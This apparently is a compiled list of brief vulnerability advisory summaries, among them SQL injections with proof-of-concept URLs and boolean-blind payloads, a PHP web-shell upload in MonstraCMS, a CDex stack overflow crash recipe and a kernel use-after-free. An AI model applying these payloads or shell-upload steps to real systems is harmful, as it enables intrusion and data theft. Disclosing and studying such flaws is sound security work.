There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file to be written anywhere on the filesystem that the Outlook app can access when an attached image is viewed in the Outlook app.
CDex 1.96 (Unicode Build) is vulnerable to a local stack buffer overflow. An attacker can exploit this vulnerability by generating a crash.txt file, opening the application, going to Options > Settings > Encoding > Tags, and pasting the crash.txt contents into the picture text field. This causes the application to crash, with the pointer to the next SEH record overwritten and no Unicode-compatible ppr (POP/POP/RET) pointers available.
The vulnerability allows an attacker to inject SQL commands into the 'promocode' parameter of the 'guruBuy' script, which can be used to extract information from the database.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_bookpro&view=popup&visatype=[SQL]
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
1) http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL]
   Parameter: bgid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=1 AND 9841=9841&fmid=7
   Parameter: fmid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=1&fmid=7 AND 2056=2056
2) http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL]
   Parameter: fnid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592
   Parameter: fmid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12
   Parameter: bgid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12
3) http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL]
   Parameter: fmid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=2&fmid=10 AND 9273=9273
   Parameter: bgid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: bgid=2 AND 8072=8072&fmid=10
MonstraCMS 3.0.4 allows users to upload arbitrary files, which leads to remote command execution on the server. An attacker can upload a file with a PHP extension containing malicious code and execute system commands by adding ?cmd= to the URL.
The injection requires user registration on CIUS CRM. Older versions have not been tested, but they are likely also vulnerable. The URL path filename appears to be vulnerable to SQL injection attacks. The payload 65079277 or 7647=07647 was submitted in the URL path filename, and a database error message was returned.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
1) http://localhost/[PATH]/index.php?md=[SQL]
2) http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL]
3) http://localhost/[PATH]/index.php?director=[SQL]
This PoC triggers a Use-After-Free (UAF) vulnerability in the Linux kernel version 4.10. The vulnerability is caused by a race condition between two threads, one that adds a timerfd and one that deletes it. The race condition can be exploited to cause a UAF, which can be used to gain arbitrary code execution.
The Enterprise version of SyncBreeze is affected by a remote Denial of Service vulnerability. The web server does not perform bounds checking when reading the Host header of a request on a new connection, resulting in a classic buffer overflow that causes a Denial of Service. To trigger the vulnerability, an attacker only needs to interact with the application using version 1.1 of the HTTP protocol.